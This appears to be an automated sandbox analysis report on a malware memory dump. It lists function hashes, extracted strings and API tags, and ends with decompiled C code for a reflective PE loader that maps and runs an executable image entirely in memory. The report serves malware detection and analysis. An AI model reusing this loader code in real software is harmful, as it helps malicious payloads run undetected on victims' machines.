Opcode ID: 467187c87abd0b1f756eeea34d25534b4ca5ec14c577182d182c0d0d5edcad9a
Instruction ID: c5031afb981c1b22f68c8da89276fff435bd355d91056179c7fd78f60a3169fa
Opcode Fuzzy Hash: 467187c87abd0b1f756eeea34d25534b4ca5ec14c577182d182c0d0d5edcad9a
Instruction Fuzzy Hash: B61220725093809FD3A4CF25C98AA4FFBE1FBC4748F108A1DE69996260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04737C07, Relevance: 7.8, Strings: 6, Instructions: 327COMMON

Download Yara Rule

Strings

2^, xrefs: 04737DDE
[W, xrefs: 04738008
:, xrefs: 04737E28
yh, xrefs: 04737F21
\K , xrefs: 0473812A
-$=, xrefs: 04738049

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: -$=$2^$:$[W$\K $yh
API String ID: 0-3270407377
Opcode ID: 79b7c440a6bbe1c24ac462ff53a048b25bd9130fc7209d87c790142b90341009
Instruction ID: 45fda5545b2651acfafec46d0d427827a3717b6a6dd3720218a6f2e532199b37
Opcode Fuzzy Hash: 79b7c440a6bbe1c24ac462ff53a048b25bd9130fc7209d87c790142b90341009
Instruction Fuzzy Hash: 99F142B15083809FD3A8CF61C989A5BFBE1FBC4758F50891DF29A86260D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0472BA95, Relevance: 7.8, Strings: 6, Instructions: 300COMMON

Download Yara Rule

Strings

s6:, xrefs: 0472BAAA
t6uF, xrefs: 0472BB92
zYA , xrefs: 0472BC55
h~, xrefs: 0472BCAE
t, xrefs: 0472BE5E
v|eR, xrefs: 0472BBC5

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: h~$s6:$t6uF$v|eR$zYA $t
API String ID: 0-1407340972
Opcode ID: 58a2e7081b0b42d12f30560b65babd0cec16555e4d277c0d8b552dce2074e255
Instruction ID: 4399ee26108f078250d834a7f65df3da500c55572d9af6a237110df4252010f0
Opcode Fuzzy Hash: 58a2e7081b0b42d12f30560b65babd0cec16555e4d277c0d8b552dce2074e255
Instruction Fuzzy Hash: 4CF110716093818FD368CF25C589A0BBBE2FBC4748F60891DF29986261D7B5D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0472480A, Relevance: 7.7, Strings: 6, Instructions: 247COMMON

Download Yara Rule

Strings

PQ, xrefs: 0472487B
4Zl, xrefs: 04724810
hk, xrefs: 04724A06
+xUX, xrefs: 047248E4
-J, xrefs: 04724B3F
GC, xrefs: 04724AAD

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: +xUX$-J$4Zl$GC$PQ$hk
API String ID: 0-2917238162
Opcode ID: 001fd00cec4f53b184c83ce814771abe34145f2eef6945654e5f337b9e1650a7
Instruction ID: d493c99d39f1201dbb44eeed2034c30d3cb52be2de2cf0530f5b0b237450e659
Opcode Fuzzy Hash: 001fd00cec4f53b184c83ce814771abe34145f2eef6945654e5f337b9e1650a7
Instruction Fuzzy Hash: 87D11C725093409FC369CF26C64A40BFBE1FBC4B48F50891DF2AA96260D7B59A09CF46

Uniqueness

Uniqueness Score: -1.00%

Function 04723894, Relevance: 6.6, Strings: 5, Instructions: 337COMMON

Download Yara Rule

Strings

X], xrefs: 04723B77
wi9, xrefs: 04723CB0
^B, xrefs: 04723B3F
NR, xrefs: 04723D9B
o|, xrefs: 047238E0

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: NR$X]$^B$o|$wi9
API String ID: 0-1889205764
Opcode ID: e568bbbccd91e868dabb4522bca5b68e3816466ad13f5a5a7b0d9a156e5c611f
Instruction ID: db39edf47e41a2802b55f274aa5e725c977eab9e095ee2200b27ed174681109e
Opcode Fuzzy Hash: e568bbbccd91e868dabb4522bca5b68e3816466ad13f5a5a7b0d9a156e5c611f
Instruction Fuzzy Hash: 2E0220B15097809FD3A8DF25C589A4BBBF1FBC4718F408A1DE5D986260DBB5990ACF03

Uniqueness

Uniqueness Score: -1.00%

Function 0472E6C7, Relevance: 6.5, Strings: 5, Instructions: 292COMMON

Download Yara Rule

Strings

q$, xrefs: 0472E8ED
h|, xrefs: 0472E829
SXm, xrefs: 0472E7BA
g9, xrefs: 0472EA2B
Km*, xrefs: 0472E6CD

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: h|$Km*$SXm$g9$q$
API String ID: 2591292051-1278607049
Opcode ID: 5cf7e70dfa756f38d3cdaf97783384caacf27975b5a66251cd3104e7d3421910
Instruction ID: 1bbfb9fb6e7b5bf43b042fa6d7bd3f8b30329bc592121641de97b0cfafeb877d
Opcode Fuzzy Hash: 5cf7e70dfa756f38d3cdaf97783384caacf27975b5a66251cd3104e7d3421910
Instruction Fuzzy Hash: FEE133715083809FD368CF26D58965BBBE2FBC8758F108A1DF2CA86260D7B59948CF47

Uniqueness

Uniqueness Score: -1.00%

Function 04724410, Relevance: 6.5, Strings: 5, Instructions: 202COMMON

Download Yara Rule

Strings

-Gx, xrefs: 0472447F
,Er, xrefs: 04724689
en, xrefs: 04724580
5~4, xrefs: 047244AF
=FU, xrefs: 0472450D

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ,Er$-Gx$5~4$=FU$en
API String ID: 0-1390153912
Opcode ID: 95957993c6c7b898366ccd48b67f639db4afed712bdb906b0072f55fe57291f5
Instruction ID: 2d739383c280fdaf4e8eabcef3575ee6c2c5f1000d0904f5e1e8c8c3b7f6b1f3
Opcode Fuzzy Hash: 95957993c6c7b898366ccd48b67f639db4afed712bdb906b0072f55fe57291f5
Instruction Fuzzy Hash: F6A13EB11093419FC358CF26D68980BFBE2FBC4758F40991EF19696260D7BADA098F43

Uniqueness

Uniqueness Score: -1.00%

Function 047374A8, Relevance: 5.2, Strings: 4, Instructions: 240COMMON

Download Yara Rule

Strings

x, xrefs: 0473753E
bZ, xrefs: 04737601
:6w, xrefs: 047375F9
pC], xrefs: 04737635

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: :6w$bZ$pC]$x
API String ID: 0-2798883068
Opcode ID: 7b1efc51df4ff3d11533b5a0c1a6ee3231edd7992f94e0f14c8caa4936a9ad37
Instruction ID: 63ccf11ee5f7eb22053423d5a8837ebf052885a2f7ca2b61fd919552eb908cf1
Opcode Fuzzy Hash: 7b1efc51df4ff3d11533b5a0c1a6ee3231edd7992f94e0f14c8caa4936a9ad37
Instruction Fuzzy Hash: 90B155B1609340AFC358CF25D58A81BBBF1FBC4758F149A2EF2869A260D3B5D905DF02

Uniqueness

Uniqueness Score: -1.00%

Function 0473A049, Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

tFp, xrefs: 0473A123
', xrefs: 0473A1F6
Q}, xrefs: 0473A0CA
?;, xrefs: 0473A073

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: '$?;$tFp$Q}
API String ID: 0-958521361
Opcode ID: cb2e66db9139c01ae3914dd70ef2751c694cff2598088edb1f03eb25acab1707
Instruction ID: 009d156cb4cbc42a886583f717643f6d6ba335457367e23d624306f37afc5d57
Opcode Fuzzy Hash: cb2e66db9139c01ae3914dd70ef2751c694cff2598088edb1f03eb25acab1707
Instruction Fuzzy Hash: 5BA10DB1D0021CABCF58CFE5C98A9EEBBB2FF44318F208159D515BA260D7B11A5ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 047309F3, Relevance: 4.0, Strings: 3, Instructions: 232COMMON

Download Yara Rule

Strings

Y$, xrefs: 04730A80
Ryq, xrefs: 04730B29
Ni, xrefs: 04730A1B

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Ni$Ryq$Y$
API String ID: 0-4078307765
Opcode ID: 2250a30d5dac1a265b38bbf42ad803bd867a23ec9d10df7b61fd3a806d8a4d36
Instruction ID: 679b6f8f3f91be605eb8a72fcb19560cb8ad291ac54822aa2b8dedeffe12ae83
Opcode Fuzzy Hash: 2250a30d5dac1a265b38bbf42ad803bd867a23ec9d10df7b61fd3a806d8a4d36
Instruction Fuzzy Hash: B5B120729083809FC358DF65C58984BFBE1BBC4758F504A2DF5D9A6221D3B5A948CF83

Uniqueness

Uniqueness Score: -1.00%

Function 04730F1B, Relevance: 4.0, Strings: 3, Instructions: 212COMMON

Download Yara Rule

Strings

3X, xrefs: 04731107
|9a, xrefs: 04730F4C
xC, xrefs: 047310B3

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 3X$xC$|9a
API String ID: 0-811610074
Opcode ID: f53111ef5e1abb4087e6d790b352894a64fefa2ea5a1eb03fbebb985a616a956
Instruction ID: 91e8c1617d2c5461b99feed07f04276e191d37ddce1d8b0bda96c4cc37d32b72
Opcode Fuzzy Hash: f53111ef5e1abb4087e6d790b352894a64fefa2ea5a1eb03fbebb985a616a956
Instruction Fuzzy Hash: 64A143729083419FC368CF2A9A8940BFBF1EBC5758F408A1DF5E596261D3B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0473FABB, Relevance: 2.6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

Strings

O), xrefs: 0473FAC1
=W, xrefs: 0473FAF1

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: =W$O)
API String ID: 1029625771-2640017631
Opcode ID: 27cb6d7e56d0ef69c1e85defb5306b93c1620880bc042b08690a9af683d0095b
Instruction ID: dff4b1718d00da729bd76b0bf694a8281ae396a4889b9f1960d5207ab3d52956
Opcode Fuzzy Hash: 27cb6d7e56d0ef69c1e85defb5306b93c1620880bc042b08690a9af683d0095b
Instruction Fuzzy Hash: 424102B2D0121EEBCF08DFA5C94A4EEBBB1FB84314F208199D511B6254D7B51B05CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04738563, Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

s, xrefs: 04738640

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: s
API String ID: 4033686569-4181575468
Opcode ID: 4b255a6816b2c40f065beb289b1efe77cc645c6269357a1b1cad2f0ef25f8d62
Instruction ID: 2bca8291678ca346fa32c761f07e5b4e2ec2a7d6bc3f3e2b17a4aa98e8c134c9
Opcode Fuzzy Hash: 4b255a6816b2c40f065beb289b1efe77cc645c6269357a1b1cad2f0ef25f8d62
Instruction Fuzzy Hash: BB41FCB1C0021DABCF18DFE5D98A9EEBFB1FB14308F208188D41276260D3B51A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04734A72, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a31684ddb8032f248c81f6beeeafbb940b848c3089f064c7f56f1479b34ce8e2
Instruction ID: 492b5620808734103133fc2b220ac9dcf1f23a84f9b739f3611bafb0b4573856
Opcode Fuzzy Hash: a31684ddb8032f248c81f6beeeafbb940b848c3089f064c7f56f1479b34ce8e2
Instruction Fuzzy Hash: 29712F72D0020DEBCF59CFE1D94A9EEBBB1FB44304F208149E911B6260D7B55A5ACF94

Uniqueness

Uniqueness Score: -1.00%

Function 100027F9, Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E100027F9(void* __eflags, unsigned int _a4) {
				void* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				unsigned int _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v68;
				char _v72;
				void* __edi;
				intOrPtr _t129;
				unsigned int _t131;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t139;
				intOrPtr _t145;
				void* _t148;
				signed int _t149;
				signed int _t151;
				signed int _t152;
				struct HINSTANCE__* _t154;
				signed int _t155;
				intOrPtr* _t161;
				signed int _t163;
				signed int _t168;
				signed int _t172;
				signed int _t176;
				unsigned int _t178;
				signed int _t181;
				signed int* _t185;
				char* _t187;
				signed short* _t189;
				signed int _t191;
				signed int _t192;
				unsigned short _t195;
				unsigned int _t197;
				signed int _t200;
				signed int _t201;
				long _t202;
				intOrPtr* _t203;
				signed int _t206;
				signed int _t209;
				void* _t217;
				signed int _t219;
				void* _t220;
				signed int _t221;
				void* _t222;
				signed int _t224;
				signed int _t228;
				intOrPtr* _t230;
				void* _t233;
				signed int _t238;
				signed int _t240;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				void* _t249;
				void* _t250;
				signed int* _t252;
				void* _t253;
				signed int _t254;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				intOrPtr* _t260;
				signed int _t262;

				_v28 = _v28 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t241 =  *0x100592ac; // 0x74770000
				_t129 = E10002765("LoadLibraryA", _t241);
				_t242 =  *0x100592ac; // 0x74770000
				_v20 = _t129;
				_t131 = E10002765("GetProcAddress", _t242);
				_t243 =  *0x100592ac; // 0x74770000
				_v24 = _t131;
				_t133 = E10002765("VirtualAlloc", _t243);
				_t244 =  *0x100592ac; // 0x74770000
				_v16 = _t133;
				_t135 = E10002765("VirtualProtect", _t244);
				_t245 =  *0x100592b0; // 0x77df0000
				_v32 = _t135;
				_t137 = E10002765("NtFlushInstructionCache", _t245);
				_t246 =  *0x100592ac; // 0x74770000
				_v36 = _t137;
				_t139 = E10002765("GetNativeSystemInfo", _t246);
				_t260 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v8 = _t139;
				if( *_t260 == 0x4550) {
					__eflags =  *((intOrPtr*)(_t260 + 4)) - 0x14c;
					if( *((intOrPtr*)(_t260 + 4)) != 0x14c) {
						goto L1;
					}
					__eflags =  *(_t260 + 0x38) & 0x00000001;
					if(( *(_t260 + 0x38) & 0x00000001) != 0) {
						goto L1;
					}
					_t201 =  *(_t260 + 6) & 0x0000ffff;
					_t222 = ( *(_t260 + 0x14) & 0x0000ffff) + _t260 + 0x18;
					__eflags = _t201;
					if(_t201 <= 0) {
						L12:
						_v8( &_v72);
						_t145 = _v68;
						_t202 =  *(_t260 + 0x50);
						_t189 = _v12;
						_t32 = _t145 - 1; // -1
						_t224 =  !(_t145 - 1);
						__eflags = (_t202 + _t32 & _t224) - (_t145 + _t189 - 0x00000001 & _t224);
						if((_t202 + _t32 & _t224) != (_t145 + _t189 - 0x00000001 & _t224)) {
							goto L1;
						}
						_t148 = VirtualAlloc(0, _t202, 0x3000, 4);
						_t203 = _a4;
						_t249 = _t148;
						_t149 =  *(_t260 + 0x54);
						_v8 = _t249;
						__eflags = _t149;
						if(_t149 == 0) {
							L16:
							_t250 = ( *(_t260 + 0x14) & 0x0000ffff) + _t260 + 0x18;
							_t151 =  *(_t260 + 6) & 0x0000ffff;
							_v12 = _t151;
							__eflags = _t151;
							if(_t151 == 0) {
								L22:
								_t191 =  *((intOrPtr*)(_t260 + 0x80)) + _v8;
								while(1) {
									_t152 =  *(_t191 + 0xc);
									__eflags = _t152;
									if(_t152 == 0) {
										break;
									}
									_t154 = LoadLibraryA(_v8 + _t152);
									_t206 =  *_t191 + _v8;
									_t252 =  *((intOrPtr*)(_t191 + 0x10)) + _v8;
									_a4 = _t154;
									while(1) {
										__eflags =  *_t252;
										_v12 = _t206;
										if( *_t252 == 0) {
											break;
										}
										__eflags =  *_t206;
										if(__eflags == 0 || __eflags >= 0) {
											_t209 = _v8 +  *_t252 + 2;
											__eflags = _t209;
											_t155 = _v24(_t154, _t209);
											_t206 = _v12;
											 *_t252 = _t155;
											_t154 = _a4;
										} else {
											_t233 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x3c)) + _t154 + 0x78)) + _t154;
											_t154 = _a4;
											 *_t252 =  *((intOrPtr*)( *((intOrPtr*)(_t233 + 0x1c)) + (( *_t206 & 0x0000ffff) -  *((intOrPtr*)(_t233 + 0x10))) * 4 + _t154)) + _t154;
										}
										_t252 =  &(_t252[1]);
										_t206 = _t206 + 4;
										__eflags = _t206;
									}
									_t191 = _t191 + 0x14;
									__eflags = _t191;
								}
								_a4 = _v8 -  *((intOrPtr*)(_t260 + 0x34));
								_t161 = _t260 + 0xa0;
								__eflags =  *(_t161 + 4);
								if( *(_t161 + 4) == 0) {
									L46:
									_t253 = ( *(_t260 + 0x14) & 0x0000ffff) + _t260 + 0x18;
									_t163 =  *(_t260 + 6) & 0x0000ffff;
									_v12 = _t163;
									__eflags = _t163;
									if(_t163 == 0) {
										L68:
										_t262 =  *((intOrPtr*)(_t260 + 0x28)) + _v8;
										__eflags = _t262;
										_v36(0xffffffff, 0, 0);
										 *_t262(0x10000000, 1, 1);
										return _v8;
									}
									_t254 = _t253 + 0x24;
									__eflags = _t254;
									do {
										_v12 = _v12 - 1;
										__eflags =  *(_t254 - 0x14);
										if( *(_t254 - 0x14) <= 0) {
											goto L67;
										}
										_t192 =  *_t254;
										_t228 = _t192 >> 0x0000001e & 0x00000001;
										_t168 = _t192 >> 0x1f;
										__eflags = _t192 >> 0x0000001d & 0x00000001;
										if((_t192 >> 0x0000001d & 0x00000001) != 0) {
											__eflags = _t228;
											if(_t228 != 0) {
												L59:
												__eflags = _t168;
												if(_t168 != 0) {
													L61:
													__eflags = _t228;
													if(_t228 != 0) {
														__eflags = _t168;
														if(_t168 != 0) {
															_a4 = 0x40;
														}
													}
													L64:
													__eflags = _t192 & 0x04000000;
													if((_t192 & 0x04000000) != 0) {
														_t115 =  &_a4;
														 *_t115 = _a4 | 0x00000200;
														__eflags =  *_t115;
													}
													_t172 = VirtualProtect( *((intOrPtr*)(_t254 - 0x18)) + _v8,  *(_t254 - 0x14), _a4,  &_v28);
													__eflags = _t172;
													if(_t172 == 0) {
														goto L1;
													} else {
														goto L67;
													}
												}
												_a4 = 0x20;
												goto L64;
											}
											__eflags = _t168;
											if(_t168 != 0) {
												__eflags = _t228;
												if(_t228 != 0) {
													goto L59;
												}
												__eflags = _t168;
												if(_t168 == 0) {
													goto L61;
												}
												_a4 = 0x80;
												goto L64;
											}
											_a4 = 0x10;
											goto L64;
										}
										__eflags = _t228;
										if(_t228 != 0) {
											__eflags = _t168;
											_a4 = (0 | _t168 != 0x00000000) + (0 | _t168 != 0x00000000) + 2;
										} else {
											asm("sbb eax, eax");
											_a4 = ( ~_t168 & 0x00000007) + 1;
										}
										goto L64;
										L67:
										_t254 = _t254 + 0x28;
										__eflags = _v12;
									} while (_v12 != 0);
									goto L68;
								}
								_t230 =  *_t161 + _v8;
								_t176 =  *(_t230 + 4);
								__eflags = _t176;
								if(_t176 == 0) {
									goto L46;
								}
								do {
									_t217 =  *_t230 + _v8;
									_t178 = _t176 + 0xfffffff8 >> 1;
									__eflags = _t178;
									_t83 = _t230 + 8; // 0x9
									_v12 = _t83;
									if(_t178 == 0) {
										goto L45;
									} else {
										goto L36;
									}
									do {
										L36:
										_v24 = _t178 - 1;
										_t181 =  *_v12 & 0x0000ffff;
										_t195 = _t181 >> 0xc;
										__eflags = _t195 - 0xa;
										if(_t195 == 0xa) {
											L38:
											 *((_t181 & 0x00000fff) + _t217) =  *((_t181 & 0x00000fff) + _t217) + _a4;
											goto L44;
										}
										__eflags = _t195 - 3;
										if(_t195 != 3) {
											__eflags = _t195 - 1;
											if(_t195 != 1) {
												__eflags = _t195 - 2;
												if(_t195 != 2) {
													goto L44;
												}
												_t197 = _a4;
												L43:
												_t185 = (_t181 & 0x00000fff) + _t217;
												 *_t185 =  *_t185 + _t197;
												__eflags =  *_t185;
												goto L44;
											}
											_t197 = _a4 >> 0x10;
											goto L43;
										}
										goto L38;
										L44:
										_t178 = _v24;
										_v12 =  &(_v12[1]);
										__eflags = _t178;
									} while (_t178 != 0);
									L45:
									_t230 = _t230 +  *(_t230 + 4);
									_t176 =  *(_t230 + 4);
									__eflags = _t176;
								} while (_t176 != 0);
								goto L46;
							}
							_t256 = _t250 + 0x14;
							__eflags = _t256;
							do {
								_v12 = _v12 - 1;
								_t187 =  *((intOrPtr*)(_t256 - 8)) + _v8;
								_t219 =  *_t256 + _a4;
								_t238 =  *(_t256 - 4);
								while(1) {
									__eflags = _t238;
									if(_t238 == 0) {
										goto L21;
									}
									_t238 = _t238 - 1;
									 *_t187 =  *_t219;
									_t187 = _t187 + 1;
									_t219 = _t219 + 1;
									__eflags = _t219;
								}
								L21:
								_t256 = _t256 + 0x28;
								__eflags = _v12 - _t238;
							} while (_v12 != _t238);
							goto L22;
						}
						_t257 = _t249 - _t203;
						__eflags = _t257;
						do {
							_t149 = _t149 - 1;
							 *((char*)(_t257 + _t203)) =  *_t203;
							_t203 = _t203 + 1;
							__eflags = _t149;
						} while (_t149 != 0);
						goto L16;
					} else {
						_t240 = _t222 + 0xc;
						__eflags = _t240;
						_t200 = _t201;
						do {
							_t258 =  *(_t240 + 4);
							_t220 =  *_t240;
							__eflags = _t258;
							if(_t258 != 0) {
								_t221 = _t220 + _t258;
								__eflags = _t221;
							} else {
								_t221 = _t220 +  *(_t260 + 0x38);
							}
							__eflags = _t221 - _v12;
							if(_t221 > _v12) {
								_v12 = _t221;
							}
							_t240 = _t240 + 0x28;
							_t200 = _t200 - 1;
							__eflags = _t200;
						} while (_t200 != 0);
						goto L12;
					}
				}
				L1:
				return 0;
			}

0x100027ff
0x10002803
0x1000280d
0x10002818
0x1000281d
0x10002823
0x1000282b
0x10002830
0x10002836
0x1000283e
0x10002843
0x10002849
0x10002851
0x10002856
0x1000285c
0x10002864
0x10002869
0x1000286f
0x10002877
0x1000287f
0x10002887
0x1000288a
0x10002898
0x1000289c
0x00000000
0x00000000
0x1000289e
0x100028a2
0x00000000
0x00000000
0x100028a4
0x100028ac
0x100028b0
0x100028b2
0x100028d7
0x100028db
0x100028de
0x100028e1
0x100028e4
0x100028ea
0x100028ee
0x100028f8
0x100028fa
0x00000000
0x00000000
0x10002906
0x10002909
0x1000290c
0x1000290e
0x10002911
0x10002914
0x10002916
0x10002925
0x10002929
0x1000292d
0x10002931
0x10002934
0x10002936
0x10002961
0x10002967
0x100029d8
0x100029d8
0x100029db
0x100029dd
0x00000000
0x00000000
0x10002972
0x1000297a
0x1000297d
0x10002980
0x100029cd
0x100029cd
0x100029d0
0x100029d3
0x00000000
0x00000000
0x10002987
0x10002989
0x100029b7
0x100029b7
0x100029bc
0x100029bf
0x100029c2
0x100029c4
0x1000298d
0x10002994
0x100029a6
0x100029ae
0x100029ae
0x100029c7
0x100029ca
0x100029ca
0x100029ca
0x100029d5
0x100029d5
0x100029d5
0x100029e5
0x100029e8
0x100029ee
0x100029f2
0x10002a73
0x10002a77
0x10002a7b
0x10002a7f
0x10002a82
0x10002a84
0x10002b4c
0x10002b4f
0x10002b4f
0x10002b58
0x10002b64
0x00000000
0x10002b66
0x10002a8a
0x10002a8a
0x10002a8d
0x10002a8d
0x10002a90
0x10002a94
0x00000000
0x00000000
0x10002a9a
0x10002aab
0x10002aae
0x10002ab1
0x10002ab3
0x10002ad6
0x10002ad8
0x10002af8
0x10002af8
0x10002afa
0x10002b05
0x10002b05
0x10002b07
0x10002b09
0x10002b0b
0x10002b0d
0x10002b0d
0x10002b0b
0x10002b14
0x10002b14
0x10002b1a
0x10002b1c
0x10002b1c
0x10002b1c
0x10002b1c
0x10002b34
0x10002b37
0x10002b39
0x00000000
0x00000000
0x00000000
0x00000000
0x10002b39
0x10002afc
0x00000000
0x10002afc
0x10002ada
0x10002adc
0x10002ae7
0x10002ae9
0x00000000
0x00000000
0x10002aeb
0x10002aed
0x00000000
0x00000000
0x10002aef
0x00000000
0x10002aef
0x10002ade
0x00000000
0x10002ade
0x10002ab5
0x10002ab7
0x10002ac8
0x10002ad1
0x10002ab9
0x10002abb
0x10002ac1
0x10002ac1
0x00000000
0x10002b3f
0x10002b3f
0x10002b42
0x10002b42
0x00000000
0x10002a8d
0x100029f6
0x100029f9
0x100029fc
0x100029fe
0x00000000
0x00000000
0x10002a05
0x10002a07
0x10002a0d
0x10002a0d
0x10002a0f
0x10002a12
0x10002a15
0x00000000
0x00000000
0x00000000
0x00000000
0x10002a17
0x10002a17
0x10002a18
0x10002a1e
0x10002a24
0x10002a28
0x10002a2c
0x10002a34
0x10002a3b
0x00000000
0x10002a3b
0x10002a2e
0x10002a32
0x10002a3f
0x10002a43
0x10002a4d
0x10002a51
0x00000000
0x00000000
0x10002a53
0x10002a57
0x10002a59
0x10002a5b
0x10002a5b
0x00000000
0x10002a5b
0x10002a48
0x00000000
0x10002a48
0x00000000
0x10002a5e
0x10002a5e
0x10002a61
0x10002a65
0x10002a65
0x10002a69
0x10002a69
0x10002a6c
0x10002a6f
0x10002a6f
0x00000000
0x10002a05
0x10002938
0x10002938
0x1000293b
0x10002940
0x10002943
0x10002946
0x10002949
0x10002955
0x10002955
0x10002957
0x00000000
0x00000000
0x10002950
0x10002951
0x10002953
0x10002954
0x10002954
0x10002954
0x10002959
0x10002959
0x1000295c
0x1000295c
0x00000000
0x1000293b
0x10002918
0x10002918
0x1000291a
0x1000291c
0x1000291d
0x10002920
0x10002921
0x10002921
0x00000000
0x100028b4
0x100028b4
0x100028b4
0x100028b7
0x100028b9
0x100028b9
0x100028bc
0x100028be
0x100028c0
0x100028c7
0x100028c7
0x100028c2
0x100028c2
0x100028c2
0x100028c9
0x100028cc
0x100028ce
0x100028ce
0x100028d1
0x100028d4
0x100028d4
0x100028d4
0x00000000
0x100028b9
0x100028b2
0x1000288c
0x00000000

APIs

